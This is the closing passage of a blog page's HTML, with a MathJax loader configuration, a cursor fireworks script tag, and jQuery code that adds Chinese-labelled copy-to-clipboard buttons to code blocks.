    //             target.parentNode.classList.add('has-jax');
    //           }
    //         });
    //       }, '', false]
    //     }
    //   }
    // };
    window.MathJax = {
      tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"] ],
        processEscapes: true
      }
    };
    (function () {
      var script = document.createElement('script');
      script.src = 'https://cdn.jsdelivr.net/npm/mathjax@2.7.8/unpacked/MathJax.js?config=TeX-MML-AM_CHTML';
      script.defer = true;
      document.head.appendChild(script);
    })();
  } else {
    MathJax.startup.document.state(0);
    MathJax.texReset();
    MathJax.typeset();
  }
</script>

    

  


  <script async src="/js/cursor/fireworks.js"></script>


    </div>
  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('复制成功')
          else $(this).text('复制失败')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>



</body>
</html>
